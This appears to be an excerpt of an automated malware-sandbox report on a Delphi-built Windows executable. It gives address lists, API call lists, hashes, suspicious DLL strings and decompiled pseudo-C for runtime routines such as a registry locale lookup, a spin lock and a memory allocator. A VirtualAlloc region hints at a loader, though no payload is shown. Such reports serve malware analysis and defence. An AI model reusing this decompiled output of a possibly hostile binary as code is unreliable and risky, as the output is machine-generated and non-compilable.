                                                0x004f9268
                                                0x004f926d
                                                0x004f9272
                                                0x004f927c
                                                0x004f9287
                                                0x004f9292
                                                0x004f929d
                                                0x004f92a6
                                                0x004f92a9
                                                0x004f92ae
                                                0x004f92b3
                                                0x004f92b8
                                                0x004f92bd
                                                0x004f92c5
                                                0x004f92cb
                                                0x004f92d6
                                                0x004f92e4
                                                0x004f92f5
                                                0x004f92fc
                                                0x004f930a
                                                0x004f930d
                                                0x004f9312
                                                0x004f931d
                                                0x004f9320
                                                0x004f9328
                                                0x004f932e
                                                0x004f9339
                                                0x004f933e
                                                0x004f9343
                                                0x004f934a
                                                0x004f934f
                                                0x004f9354
                                                0x004f9364
                                                0x004f936a
                                                0x004f9372
                                                0x004f937b
                                                0x004f9380
                                                0x004f942d
                                                0x004f9432
                                                0x004f9437
                                                0x004f9437
                                                0x004f943d
                                                0x004f9386
                                                0x004f9386
                                                0x004f938e
                                                0x004f9394
                                                0x004f93de
                                                0x004f93e6
                                                0x004f9396
                                                0x004f9398
                                                0x004f939f
                                                0x004f93a1
                                                0x004f93c2
                                                0x004f93c7
                                                0x004f93cd
                                                0x004f93d7
                                                0x004f93d7
                                                0x004f93e9
                                                0x004f93f3
                                                0x004f93f8
                                                0x004f93fd
                                                0x004f9402
                                                0x004f940a
                                                0x004f9410
                                                0x004f941b
                                                0x004f941b
                                                0x004f944c
                                                0x004f9451
                                                0x004f945c
                                                0x004f9461
                                                0x004f946b
                                                0x004f9470
                                                0x004f9478
                                                0x004f9485
                                                0x004f9496
                                                0x004f94a7
                                                0x004f94bd
                                                0x004f94c8
                                                0x004f94d2
                                                0x004f94e3
                                                0x004f94e4
                                                0x004f94e9
                                                0x004f94ee
                                                0x004f94f9
                                                0x004f9502
                                                0x004f9505
                                                0x004f9510
                                                0x004f9520
                                                0x004f952c
                                                0x004f952c
                                                0x004f9537
                                                0x004f953d
                                                0x004f9548
                                                0x004f954d
                                                0x004f9554
                                                0x004f9556
                                                0x004f9556
                                                0x004f955f
                                                0x004f9562
                                                0x004f9562
                                                0x004f9556
                                                0x004f9568
                                                0x004f956d
                                                0x004f9572
                                                0x004f9577
                                                0x004f957d
                                                0x004f9582
                                                0x004f9586
                                                0x004f9589
                                                0x004f958d
                                                0x004f958f
                                                0x004f9595
                                                0x004f9596
                                                0x004f959e
                                                0x004f95b1
                                                0x004f95b1
                                                0x004f958d
                                                0x004f95c9
                                                0x004f95ce
                                                0x004f95ce
                                                0x004f95d5
                                                0x004f95d5
                                                0x004f95dd
                                                0x004f95e3
                                                0x004f95ed
                                                0x004f95fa
                                                0x004f9603
                                                0x004f9606
                                                0x004f960b
                                                0x004f961b
                                                0x004f961d
                                                0x004f961d
                                                0x004f9629
                                                0x004f962c
                                                0x004f962c
                                                0x004f9631
                                                0x004f9638
                                                0x004f9642
                                                0x004f9642
                                                0x004f964c

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID: $$O$.dll$AlpcGetMessageAttribute$D3DCompiler_47.dll$DO$EP0NRE9C.DLL$QueryTraceA$RegDeleteKeyW$SetProcessAffinityMask$ZwQueryOpenSubKeys$ZwYieldExecution$logscrpt.dll$shmig.dll$sspicli.dll$vpnikeapi.dll
                                                • API String ID: 0-2387494972
                                                • Opcode ID: 153290a803969b51b322323f0b52c91d6443626fb3ec939816f13861025abb15
                                                • Instruction ID: a6f21e26090de89f52c20706870a5f057079cda2a9eef0185e01c3a742549dac
                                                • Opcode Fuzzy Hash: 153290a803969b51b322323f0b52c91d6443626fb3ec939816f13861025abb15
                                                • Instruction Fuzzy Hash: 37D2F671910249EFDB00DFAAE984AADB7F1FB08306F10447AE505E7275D738A961CF29
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E0040918C(char __eax, void* __ebx, void* __ecx, void* __edx) {
                                                				char _v8;
                                                				char* _v12;
                                                				void* _v16;
                                                				int _v20;
                                                				short _v542;
                                                				long _t51;
                                                				long _t85;
                                                				long _t87;
                                                				long _t89;
                                                				long _t91;
                                                				long _t93;
                                                				void* _t97;
                                                				intOrPtr _t106;
                                                				intOrPtr _t108;
                                                				void* _t112;
                                                				void* _t113;
                                                				intOrPtr _t114;
                                                
                                                				_t112 = _t113;
                                                				_t114 = _t113 + 0xfffffde4;
                                                				_t97 = __edx;
                                                				_v8 = __eax;
                                                				E00406A8C(_v8);
                                                				_push(_t112);
                                                				_push(0x4093b1);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t114;
                                                				if(_v8 != 0) {
                                                					E004089C0( &_v542, E00407330(_v8), 0x105);
                                                				} else {
                                                					GetModuleFileNameW(0,  &_v542, 0x105);
                                                				}
                                                				if(_v542 == 0) {
                                                					L18:
                                                					_pop(_t106);
                                                					 *[fs:eax] = _t106;
                                                					_push(E004093B8);
                                                					return E004069A8( &_v8);
                                                				} else {
                                                					_v12 = 0;
                                                					_t51 = RegOpenKeyExW(0x80000001, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
                                                					if(_t51 == 0) {
                                                						L10:
                                                						_push(_t112);
                                                						_push(0x409394);
                                                						_push( *[fs:eax]);
                                                						 *[fs:eax] = _t114;
                                                						E00408F9C( &_v542, 0x105);
                                                						if(RegQueryValueExW(_v16,  &_v542, 0, 0, 0,  &_v20) != 0) {
                                                							if(RegQueryValueExW(_v16, 0x4094a4, 0, 0, 0,  &_v20) == 0) {
                                                								_v12 = E004044B4(_v20);
                                                								RegQueryValueExW(_v16, 0x4094a4, 0, 0, _v12,  &_v20);
                                                								E00407388(_t97, _v12);
                                                							}
                                                						} else {
                                                							_v12 = E004044B4(_v20);
                                                							RegQueryValueExW(_v16,  &_v542, 0, 0, _v12,  &_v20);
                                                							E00407388(_t97, _v12);
                                                						}
                                                						_pop(_t108);
                                                						 *[fs:eax] = _t108;
                                                						_push(0x40939b);
                                                						if(_v12 != 0) {
                                                							E004044D0(_v12);
                                                						}
                                                						return RegCloseKey(_v16);
                                                					} else {
                                                						_t85 = RegOpenKeyExW(0x80000002, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
                                                						if(_t85 == 0) {
                                                							goto L10;
                                                						} else {
                                                							_t87 = RegOpenKeyExW(0x80000001, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
                                                							if(_t87 == 0) {
                                                								goto L10;
                                                							} else {
                                                								_t89 = RegOpenKeyExW(0x80000002, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
                                                								if(_t89 == 0) {
                                                									goto L10;
                                                								} else {
                                                									_t91 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Locales", 0, 0xf0019,  &_v16); // executed
                                                									if(_t91 == 0) {
                                                										goto L10;
                                                									} else {
                                                										_t93 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v16); // executed
                                                										if(_t93 != 0) {
                                                											goto L18;
                                                										} else {
                                                											goto L10;
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                			}





















                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,004093B1,?,?), ref: 004091C5
                                                • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,004093B1,?,?), ref: 0040920E
                                                • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,004093B1,?,?), ref: 00409230
                                                • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040924E
                                                • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040926C
                                                • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040928A
                                                • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 004092A8
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00409394,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,004093B1), ref: 004092E8
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,00409394,?,80000001), ref: 00409313
                                                • RegCloseKey.ADVAPI32(?,0040939B,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,00409394,?,80000001,Software\Embarcadero\Locales), ref: 0040938E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: Open$QueryValue$CloseFileModuleName
                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                • API String ID: 2701450724-3496071916
                                                • Opcode ID: f5904ab30cac741b4ef6d492028240753c3d0504ac5ccb69b28adc174c7229e0
                                                • Instruction ID: 454187ae786063e5553441e2319b604b82b232e66815bb2dbe82f88c2e36da2d
                                                • Opcode Fuzzy Hash: f5904ab30cac741b4ef6d492028240753c3d0504ac5ccb69b28adc174c7229e0
                                                • Instruction Fuzzy Hash: 60512375A4020DBEEB10EAA5CD46FAE73BCDB08704F50447BBA04F61C3D6B89E418A59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0077024D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID: cess$kernel32.dll
                                                • API String ID: 4275171209-1230238691
                                                • Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
                                                • Instruction ID: 61fea845af4cb53fdcf21fd180de3cee558ae144cb8e06e91107be009a9b22a9
                                                • Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
                                                • Instruction Fuzzy Hash: 63526874A00229DFDB64CF68C985BA8BBB1BF09304F1480D9E90DAB351DB34AE95DF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 88%
                                                			E004058A8(signed char* __eax, void* __edx, void* __eflags) {
                                                				void* _t49;
                                                				signed char _t56;
                                                				intOrPtr _t57;
                                                				signed char _t59;
                                                				void* _t70;
                                                				signed char* _t71;
                                                				intOrPtr _t72;
                                                				signed char* _t73;
                                                
                                                				_t70 = __edx;
                                                				_t71 = __eax;
                                                				_t72 =  *((intOrPtr*)(__eax + 0x10));
                                                				while(1) {
                                                					L1:
                                                					 *_t73 = E00405D34(_t71);
                                                					if( *_t73 != 0 || _t70 == 0) {
                                                						break;
                                                					}
                                                					_t73[1] = 0;
                                                					if(_t72 <= 0) {
                                                						while(1) {
                                                							L17:
                                                							_t56 =  *_t71;
                                                							if(_t56 == 0) {
                                                								goto L1;
                                                							}
                                                							asm("lock cmpxchg [esi], edx");
                                                							if(_t56 != _t56) {
                                                								continue;
                                                							} else {
                                                								goto L19;
                                                							}
                                                							do {
                                                								L19:
                                                								_t73[4] = GetTickCount();
                                                								E00405AA0(_t71);
                                                								_t57 =  *0x5008f4; // 0x4fe4c8
                                                								 *((intOrPtr*)(_t57 + 0x10))();
                                                								 *_t73 = 0 == 0;
                                                								if(_t70 != 0xffffffff) {
                                                									_t73[8] = GetTickCount();
                                                									if(_t70 <= _t73[8] - _t73[4]) {
                                                										_t70 = 0;
                                                									} else {
                                                										_t70 = _t70 - _t73[8] - _t73[4];
                                                									}
                                                								}
                                                								if( *_t73 == 0) {
                                                									do {
                                                										asm("lock cmpxchg [esi], edx");
                                                									} while ( *_t71 !=  *_t71);
                                                									_t73[1] = 1;
                                                								} else {
                                                									while(1) {
                                                										_t59 =  *_t71;
                                                										if((_t59 & 0x00000001) != 0) {
                                                											goto L29;
                                                										}
                                                										asm("lock cmpxchg [esi], edx");
                                                										if(_t59 != _t59) {
                                                											continue;
                                                										}
                                                										_t73[1] = 1;
                                                										goto L29;
                                                									}
                                                								}
                                                								L29:
                                                							} while (_t73[1] == 0);
                                                							if( *_t73 != 0) {
                                                								_t71[8] = GetCurrentThreadId();
                                                								_t71[4] = 1;
                                                							}
                                                							goto L32;
                                                						}
                                                						continue;
                                                					}
                                                					_t73[4] = GetTickCount();
                                                					_t73[0xc] = 0;
                                                					if(_t72 <= 0) {
                                                						L13:
                                                						if(_t70 == 0xffffffff) {
                                                							goto L17;
                                                						}
                                                						_t73[8] = GetTickCount();
                                                						_t49 = _t73[8] - _t73[4];
                                                						if(_t70 > _t49) {
                                                							_t70 = _t70 - _t49;
                                                							goto L17;
                                                						}
                                                						 *_t73 = 0;
                                                						break;
                                                					}
                                                					L5:
                                                					L5:
                                                					if(_t70 == 0xffffffff || _t70 > GetTickCount() - _t73[4]) {
                                                						goto L8;
                                                					} else {
                                                						 *_t73 = 0;
                                                					}
                                                					break;
                                                					L8:
                                                					if( *_t71 > 1) {
                                                						goto L13;
                                                					}
                                                					if( *_t71 != 0) {
                                                						L12:
                                                						E00405564( &(_t73[0xc]));
                                                						_t72 = _t72 - 1;
                                                						if(_t72 > 0) {
                                                							goto L5;
                                                						}
                                                						goto L13;
                                                					}
                                                					asm("lock cmpxchg [esi], edx");
                                                					if(0 != 0) {
                                                						goto L12;
                                                					}
                                                					_t71[8] = GetCurrentThreadId();
                                                					_t71[4] = 1;
                                                					 *_t73 = 1;
                                                					break;
                                                				}
                                                				L32:
                                                				return  *_t73 & 0x000000ff;
                                                			}











                                                0x0040595e
                                                0x00405964
                                                0x0040596f
                                                0x00000000
                                                0x0040596f
                                                0x00405966
                                                0x00000000
                                                0x00405966
                                                0x00000000
                                                0x004058f2
                                                0x004058f5
                                                0x00000000
                                                0x00405904
                                                0x00405904
                                                0x00405904
                                                0x00000000
                                                0x0040590d
                                                0x00405910
                                                0x00000000
                                                0x00000000
                                                0x00405915
                                                0x0040593e
                                                0x00405942
                                                0x00405947
                                                0x0040594a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040594a
                                                0x0040591e
                                                0x00405924
                                                0x00000000
                                                0x00000000
                                                0x0040592b
                                                0x0040592e
                                                0x00405935
                                                0x00000000
                                                0x00405935
                                                0x00405a31
                                                0x00405a3c

                                                APIs
                                                  • Part of subcall function 00405D34: GetCurrentThreadId.KERNEL32 ref: 00405D37
                                                • GetTickCount.KERNEL32 ref: 004058DF
                                                • GetTickCount.KERNEL32 ref: 004058F7
                                                • GetCurrentThreadId.KERNEL32 ref: 00405926
                                                • GetTickCount.KERNEL32 ref: 00405951
                                                • GetTickCount.KERNEL32 ref: 00405988
                                                • GetTickCount.KERNEL32 ref: 004059B2
                                                • GetCurrentThreadId.KERNEL32 ref: 00405A22
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: CountTick$CurrentThread
                                                • String ID: ]fOzfO
                                                • API String ID: 3968769311-1484066218
                                                • Opcode ID: bf3ba3bf5d0d1e4ac3ab4d6b20b77107c765a2c1294e60432f27748c811c1796
                                                • Instruction ID: f9e0b74dae2fd0dce5a8ccb706f8281a6c5d2711acfe29b67af50c63a209dd9d
                                                • Opcode Fuzzy Hash: bf3ba3bf5d0d1e4ac3ab4d6b20b77107c765a2c1294e60432f27748c811c1796
                                                • Instruction Fuzzy Hash: 37417D71208B819FD721AE39C58471FBBD1EB81364F148A3EE4D8972C1E678C881CF5A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 67%
                                                			E00402FAC(signed int __eax) {
                                                				signed int __ebx;
                                                				signed int __edi;
                                                				signed int __esi;
                                                				void* _t96;
                                                				void** _t99;
                                                				signed int _t104;
                                                				signed int _t109;
                                                				signed int _t110;
                                                				intOrPtr* _t114;
                                                				void* _t116;
                                                				void* _t121;
                                                				signed int _t125;
                                                				signed int _t129;
                                                				signed int _t131;
                                                				signed int _t132;
                                                				signed int _t133;
                                                				signed int _t134;
                                                				signed int _t135;
                                                				unsigned int _t141;
                                                				signed int _t142;
                                                				void* _t144;
                                                				void* _t147;
                                                				intOrPtr _t148;
                                                				signed int _t150;
                                                				long _t156;
                                                				intOrPtr _t159;
                                                				signed int _t162;
                                                
                                                				_t129 =  *0x500055; // 0x0
                                                				if(__eax > 0xa2c) {
                                                					__eflags = __eax - 0x40a2c;
                                                					if(__eax > 0x40a2c) {
                                                						_pop(_t120);
                                                						__eflags = __eax;
                                                						if(__eax >= 0) {
                                                							_push(_t120);
                                                							_t162 = __eax;
                                                							_t156 = __eax + 0x00010010 - 0x00000001 + 0x00000004 & 0xffff0000;
                                                							_t96 = VirtualAlloc(0, _t156, 0x101000, 4); // executed
                                                							_t121 = _t96;
                                                							if(_t121 != 0) {
                                                								_t147 = _t121;
                                                								 *((intOrPtr*)(_t147 + 8)) = _t162;
                                                								 *(_t147 + 0xc) = _t156 | 0x00000004;
                                                								E00402D0C();
                                                								_t99 =  *0x502b7c; // 0x502b78
                                                								 *_t147 = 0x502b78;
                                                								 *0x502b7c = _t121;
                                                								 *(_t147 + 4) = _t99;
                                                								 *_t99 = _t121;
                                                								 *0x502b74 = 0;
                                                								_t121 = _t121 + 0x10;
                                                							}
                                                							return _t121;
                                                						} else {
                                                							__eflags = 0;
                                                							return 0;
                                                						}
                                                					} else {
                                                						_t125 = (__eax + 0x000000d3 & 0xffffff00) + 0x30;
                                                						__eflags = _t129;
                                                						if(__eflags != 0) {
                                                							while(1) {
                                                								asm("lock cmpxchg [0x500ae4], ah");
                                                								if(__eflags == 0) {
                                                									goto L42;
                                                								}
                                                								asm("pause");
                                                								__eflags =  *0x500985;
                                                								if(__eflags != 0) {
                                                									continue;
                                                								} else {
                                                									Sleep(0);
                                                									asm("lock cmpxchg [0x500ae4], ah");
                                                									if(__eflags != 0) {
                                                										Sleep(0xa);
                                                										continue;
                                                									}
                                                								}
                                                								goto L42;
                                                							}
                                                						}
                                                						L42:
                                                						_t141 = _t125 - 0xb30;
                                                						_t142 = _t141 >> 0xd;
                                                						_t131 = _t141 >> 8;
                                                						_t104 = 0xffffffff << _t131 &  *(0x500af4 + _t142 * 4);
                                                						__eflags = 0xffffffff;
                                                						if(0xffffffff == 0) {
                                                							_t132 = _t142;
                                                							__eflags = 0xfffffffe << _t132 &  *0x500af0;
                                                							if((0xfffffffe << _t132 &  *0x500af0) == 0) {
                                                								_t133 =  *0x500aec; // 0x0
                                                								_t134 = _t133 - _t125;
                                                								__eflags = _t134;
                                                								if(_t134 < 0) {
                                                									_t109 = E00402C90(_t125);
                                                								} else {
                                                									_t110 =  *0x500ae8; // 0x26347f0
                                                									_t109 = _t110 - _t125;
                                                									 *0x500ae8 = _t109;
                                                									 *0x500aec = _t134;
                                                									 *(_t109 - 4) = _t125 | 0x00000002;
                                                								}
                                                								 *0x500ae4 = 0;
                                                								return _t109;
                                                							} else {
                                                								asm("bsf edx, eax");
                                                								asm("bsf ecx, eax");
                                                								_t135 = _t132 | _t142 << 0x00000005;
                                                								goto L50;
                                                							}
                                                						} else {
                                                							asm("bsf eax, eax");
                                                							_t135 = _t131 & 0xffffffe0 | _t104;
                                                							L50:
                                                							_push(_t152);
                                                							_push(_t145);
                                                							_t148 = 0x500b74 + _t135 * 8;
                                                							_t159 =  *((intOrPtr*)(_t148 + 4));
                                                							_t114 =  *((intOrPtr*)(_t159 + 4));
                                                							 *((intOrPtr*)(_t148 + 4)) = _t114;
                                                							 *_t114 = _t148;
                                                							__eflags = _t148 - _t114;
                                                							if(_t148 == _t114) {
                                                								asm("rol eax, cl");
                                                								_t80 = 0x500af4 + _t142 * 4;
                                                								 *_t80 =  *(0x500af4 + _t142 * 4) & 0xfffffffe;
                                                								__eflags =  *_t80;
                                                								if( *_t80 == 0) {
                                                									asm("btr [0x500af0], edx");
                                                								}
                                                							}
                                                							_t150 = 0xfffffff0 &  *(_t159 - 4);
                                                							_t144 = 0xfffffff0 - _t125;
                                                							__eflags = 0xfffffff0;
                                                							if(0xfffffff0 == 0) {
                                                								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
                                                								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
                                                								__eflags =  *_t89;
                                                							} else {
                                                								_t116 = _t125 + _t159;
                                                								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
                                                								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
                                                								__eflags = 0xfffffff0 - 0xb30;
                                                								if(0xfffffff0 >= 0xb30) {
                                                									E00402BC4(_t116, 0xfffffffffffffff3, _t144);
                                                								}
                                                							}
                                                							 *(_t159 - 4) = _t125 + 2;
                                                							 *0x500ae4 = 0;
                                                							return _t159;
                                                						}
                                                					}
                                                				} else {
                                                					__eflags = __cl;
                                                					__eax =  *(__edx + 0x50098c) & 0x000000ff;
                                                					__ebx = 0x4fd064 + ( *(__edx + 0x50098c) & 0x000000ff) * 8;
                                                					if(__eflags != 0) {
                                                						while(1) {
                                                							__eax = 0x100;
                                                							asm("lock cmpxchg [ebx], ah");
                                                							if(__eflags == 0) {
                                                								goto L5;
                                                							}
                                                							__ebx = __ebx + 0x20;
                                                							__eflags = __ebx;
                                                							__eax = 0x100;
                                                							asm("lock cmpxchg [ebx], ah");
                                                							if(__ebx != 0) {
                                                								__ebx = __ebx + 0x20;
                                                								__eflags = __ebx;
                                                								__eax = 0x100;
                                                								asm("lock cmpxchg [ebx], ah");
                                                								if(__ebx != 0) {
                                                									__ebx = __ebx - 0x40;
                                                									asm("pause");
                                                									__eflags =  *0x500985;
                                                									if(__eflags != 0) {
                                                										continue;
                                                									} else {
                                                										Sleep(0);
                                                										__eax = 0x100;
                                                										asm("lock cmpxchg [ebx], ah");
                                                										if(__eflags != 0) {
                                                											Sleep(0xa);
                                                											continue;
                                                										}
                                                									}
                                                								}
                                                							}
                                                							goto L5;
                                                						}
                                                					}
                                                					L5:
                                                					__edx =  *(__ebx + 8);
                                                					_t10 = __edx + 0x10; // 0xdbf71273
                                                					__eax =  *_t10;
                                                					__ecx = 0xfffffff8;
                                                					__eflags = __edx - __ebx;
                                                					if(__edx == __ebx) {
                                                						__edx =  *(__ebx + 0x18);
                                                						__ecx =  *(__ebx + 2) & 0x0000ffff;
                                                						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
                                                						__eflags = __eax -  *(__ebx + 0x14);
                                                						if(__eax >  *(__ebx + 0x14)) {
                                                							_push(__esi);
                                                							_push(__edi);
                                                							__eflags =  *0x500055;
                                                							if(__eflags != 0) {
                                                								while(1) {
                                                									__eax = 0x100;
                                                									asm("lock cmpxchg [0x500ae4], ah");
                                                									if(__eflags == 0) {
                                                										goto L22;
                                                									}
                                                									asm("pause");
                                                									__eflags =  *0x500985;
                                                									if(__eflags != 0) {
                                                										continue;
                                                									} else {
                                                										Sleep(0);
                                                										__eax = 0x100;
                                                										asm("lock cmpxchg [0x500ae4], ah");
                                                										if(__eflags != 0) {
                                                											Sleep(0xa);
                                                											continue;
                                                										}
                                                									}
                                                									goto L22;
                                                								}
                                                							}
                                                							L22:
                                                							 *(__ebx + 1) =  *(__ebx + 1) &  *0x500af0;
                                                							__eflags =  *(__ebx + 1) &  *0x500af0;
                                                							if(( *(__ebx + 1) &  *0x500af0) == 0) {
                                                								__ecx =  *(__ebx + 4) & 0x0000ffff;
                                                								__edi =  *0x500aec; // 0x0
                                                								__eflags = __edi - ( *(__ebx + 4) & 0x0000ffff);
                                                								if(__edi < ( *(__ebx + 4) & 0x0000ffff)) {
                                                									__eax =  *(__ebx + 6) & 0x0000ffff;
                                                									__edi = __eax;
                                                									__eax = E00402C90(__eax);
                                                									__esi = __eax;
                                                									__eflags = __eax;
                                                									if(__eax != 0) {
                                                										goto L35;
                                                									} else {
                                                										 *0x500ae4 = __al;
                                                										 *__ebx = __al;
                                                										_pop(__edi);
                                                										_pop(__esi);
                                                										_pop(__ebx);
                                                										return __eax;
                                                									}
                                                								} else {
                                                									__esi =  *0x500ae8; // 0x26347f0
                                                									__ecx =  *(__ebx + 6) & 0x0000ffff;
                                                									__edx = __ecx + 0xb30;
                                                									__eflags = __edi - __ecx + 0xb30;
                                                									if(__edi >= __ecx + 0xb30) {
                                                										__edi = __ecx;
                                                									}
                                                									__esi = __esi - __edi;
                                                									 *0x500aec =  *0x500aec - __edi;
                                                									 *0x500ae8 = __esi;
                                                									goto L35;
                                                								}
                                                							} else {
                                                								asm("bsf eax, esi");
                                                								__esi = __eax * 8;
                                                								__ecx =  *(0x500af4 + __eax * 4);
                                                								asm("bsf ecx, ecx");
                                                								__ecx =  *(0x500af4 + __eax * 4) + __eax * 8 * 4;
                                                								__edi = 0x500b74 + ( *(0x500af4 + __eax * 4) + __eax * 8 * 4) * 8;
                                                								__esi =  *(__edi + 4);
                                                								__edx =  *(__esi + 4);
                                                								 *(__edi + 4) = __edx;
                                                								 *__edx = __edi;
                                                								__eflags = __edi - __edx;
                                                								if(__edi == __edx) {
                                                									__edx = 0xfffffffe;
                                                									asm("rol edx, cl");
                                                									_t38 = 0x500af4 + __eax * 4;
                                                									 *_t38 =  *(0x500af4 + __eax * 4) & 0xfffffffe;
                                                									__eflags =  *_t38;
                                                									if( *_t38 == 0) {
                                                										asm("btr [0x500af0], eax");
                                                									}
                                                								}
                                                								__edi = 0xfffffff0;
                                                								__edi = 0xfffffff0 &  *(__esi - 4);
                                                								__eflags = 0xfffffff0 - 0x10a60;
                                                								if(0xfffffff0 < 0x10a60) {
                                                									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
                                                									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
                                                									__eflags =  *_t52;
                                                								} else {
                                                									__edx = __edi;
                                                									__edi =  *(__ebx + 6) & 0x0000ffff;
                                                									__edx = __edx - __edi;
                                                									__eax = __edi + __esi;
                                                									__ecx = __edx + 3;
                                                									 *(__eax - 4) = __ecx;
                                                									 *(__edx + __eax - 8) = __edx;
                                                									__eax = E00402BC4(__eax, __ecx, __edx);
                                                								}
                                                								L35:
                                                								_t56 = __edi + 6; // 0x6
                                                								__ecx = _t56;
                                                								 *(__esi - 4) = _t56;
                                                								__eax = 0;
                                                								 *0x500ae4 = __al;
                                                								 *__esi = __ebx;
                                                								 *((intOrPtr*)(__esi + 0x10)) = 0;
                                                								 *((intOrPtr*)(__esi + 0x14)) = 1;
                                                								 *(__ebx + 0x18) = __esi;
                                                								_t61 = __esi + 0x20; // 0x2634810
                                                								__eax = _t61;
                                                								__ecx =  *(__ebx + 2) & 0x0000ffff;
                                                								__edx = __ecx + __eax;
                                                								 *(__ebx + 0x10) = __ecx + __eax;
                                                								__edi = __edi + __esi;
                                                								__edi = __edi - __ecx;
                                                								__eflags = __edi;
                                                								 *(__ebx + 0x14) = __edi;
                                                								 *__ebx = 0;
                                                								 *(__eax - 4) = __esi;
                                                								_pop(__edi);
                                                								_pop(__esi);
                                                								_pop(__ebx);
                                                								return __eax;
                                                							}
                                                						} else {
                                                							_t19 = __edx + 0x14;
                                                							 *_t19 =  *(__edx + 0x14) + 1;
                                                							__eflags =  *_t19;
                                                							 *(__ebx + 0x10) = __ecx;
                                                							 *__ebx = 0;
                                                							 *(__eax - 4) = __edx;
                                                							_pop(__ebx);
                                                							return __eax;
                                                						}
                                                					} else {
                                                						 *(__edx + 0x14) =  *(__edx + 0x14) + 1;
                                                						__ecx = 0xfffffff8 &  *(__eax - 4);
                                                						__eflags = 0xfffffff8;
                                                						 *(__edx + 0x10) = 0xfffffff8 &  *(__eax - 4);
                                                						 *(__eax - 4) = __edx;
                                                						if(0xfffffff8 == 0) {
                                                							_t23 = __edx + 8; // 0xfb81cb09
                                                							__ecx =  *_t23;
                                                							 *(__ecx + 0xc) = __ebx;
                                                							 *(__ebx + 8) = __ecx;
                                                							 *__ebx = 0;
                                                							_pop(__ebx);
                                                							return __eax;
                                                						} else {
                                                							 *__ebx = 0;
                                                							_pop(__ebx);
                                                							return __eax;
                                                						}
                                                					}
                                                				}
                                                			}































                                                APIs
                                                • Sleep.KERNEL32(00000000,?,0040384C), ref: 00403063
                                                • Sleep.KERNEL32(0000000A,00000000,?,0040384C), ref: 00403079
                                                • Sleep.KERNEL32(00000000,?,?,?,0040384C), ref: 004030A7
